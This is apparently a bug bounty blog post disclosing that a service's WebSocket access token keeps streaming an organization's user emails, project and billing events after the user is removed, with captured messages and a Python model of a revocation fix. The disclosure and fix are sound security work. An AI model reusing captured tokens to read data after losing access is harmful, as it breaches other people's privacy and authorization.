Hunting Websockets For Fun And Profit



It's been a while since we came up with a blog post.
So this post will be about how I grabbed every piece of information that was being updated across my organization, even after I was removed from the organization.

First, let's start with what WebSockets are.
A good explanation can be found here: https://pusher.com/websockets

Let's start. As the program is private I cannot share it, so I'll name it victim.com, and the subdomain of the organization abc.victim.com.

So while doing my normal testing I noticed that whenever any info was changed on abc.victim.com, a WebSocket request carrying the details of the change was made. For example, in my case:

https://api.victim.com/ws?account_id=660681&access_token=1055279.rJBikWGAfRCTgrK8xhXeoF7hR5j-kB4SriC3jZOqZH_JapsE2vZ206qKVsS5qPqNntpsBh-nBCDmzQuuepCxKw

The response for the above WebSocket connection was:

{"action":"update","acting_user_id":null,"object":{"user_connection":{"id":63184,"person_id":175308,"last_active_at":"2016-08-22T06:06:02.651Z"}}}

After looking at the response I thought: what would happen if the user were removed from the organization? Would he still be able to fetch data from the organization?

Now the question was: what can and cannot be extracted from the WebSocket?

The first thing I noticed was that, after getting kicked from the organization, the user is still able to extract every detail of the changes happening in the organization, simply by reconnecting with the WebSocket request we captured earlier. The access_token in the URL keeps working and the server keeps pushing the organization's events to it.

Example of the responses received after the user was removed from the organization:

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.603Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205693,"first_name":"owner","last_name":"owner","email":"myemailhere@gmail.com","login":"enabled","admin":true,"archived":false,"subscribed":true,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200\u0026d=https://victim.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:17:20.656Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.000Z"}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:35.489Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1000,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":2,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:11.285Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205695,"first_name":"aman","last_name":"dhaker","email":"testmymailforxss@gmail.com","login":"disabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200\u0026d=https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:20:54.998Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"person":{"id":205695,"first_name":"owner","last_name":"owner","email":"testmymailforxss@gmail.com","login":"enabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200\u0026d=https://victim-files.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:21:26.586Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"create","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:36.192Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:57.285Z"}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205696,"first_name":"aman","last_name":"dhaker","email":"","login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:22:06.751Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":3,"interval":"monthly","card":null,"address":null,"discount":null}}}

I was able to extract user emails, project details, customer details and contacts.
The notable thing I noticed was that I was able to extract those details even when I only had view-only permission.
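The root cause is that the server authorizes the WebSocket only once, at the handshake, and never again for the lifetime of the connection or the token. Below is an added Python model (not the blog's or the target's code; OrgFeed and every name in it are hypothetical) of a fan-out loop that re-checks membership on every delivery and revokes a removed member's token and socket the moment the "destroy person" event is broadcast.

```python
import json
import secrets

class OrgFeed:
    """Hypothetical server-side fan-out for one organization's event feed."""
    def __init__(self, member_ids):
        self.members = set(member_ids)  # person_ids currently in the org
        self.tokens = {}                # access_token -> person_id
        self.sockets = {}               # person_id -> delivered events (stands in for an open socket)

    def issue_token(self, person_id):
        if person_id not in self.members:
            raise PermissionError("not a member of this organization")
        token = secrets.token_urlsafe(24)
        self.tokens[token] = person_id
        return token

    def connect(self, token):
        """Handshake check: the token must be known AND its owner must still be a member."""
        person_id = self.tokens.get(token)
        if person_id is None or person_id not in self.members:
            return False
        self.sockets.setdefault(person_id, [])
        return True

    def remove_member(self, person_id):
        """Leaving the org closes the socket and invalidates every token issued to that person."""
        self.members.discard(person_id)
        self.sockets.pop(person_id, None)
        for token in [t for t, p in self.tokens.items() if p == person_id]:
            del self.tokens[token]

    def publish(self, message):
        """Broadcast one event, re-checking membership per delivery; returns the recipients."""
        event = json.loads(message)
        obj = event.get("object", {})
        if event.get("action") == "destroy" and "person" in obj:
            self.remove_member(obj["person"]["id"])  # revoke before fan-out, not after
        delivered = []
        for person_id, inbox in self.sockets.items():
            if person_id in self.members:  # a stale socket of a removed member gets nothing
                inbox.append(event)
                delivered.append(person_id)
        return delivered

# Constructed sample events, shaped like the messages quoted in the post.
PROJECT_UPDATE = json.dumps({"action": "update", "acting_user_id": 202510,
                             "object": {"project": {"id": 799337, "name": "dada"}}})
DESTROY_PERSON = json.dumps({"action": "destroy", "acting_user_id": 202510,
                             "object": {"person": {"id": 205693, "email": "myemailhere@gmail.com"}}})
```

With this model the removed member's existing socket stops receiving events and the captured access_token is refused on reconnect, which is exactly what the real service failed to do.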

Thanks For Reading.
Cheers
Bugdiscloseguys

12 comments:

  1. for this you got $1000 wow congrats leet
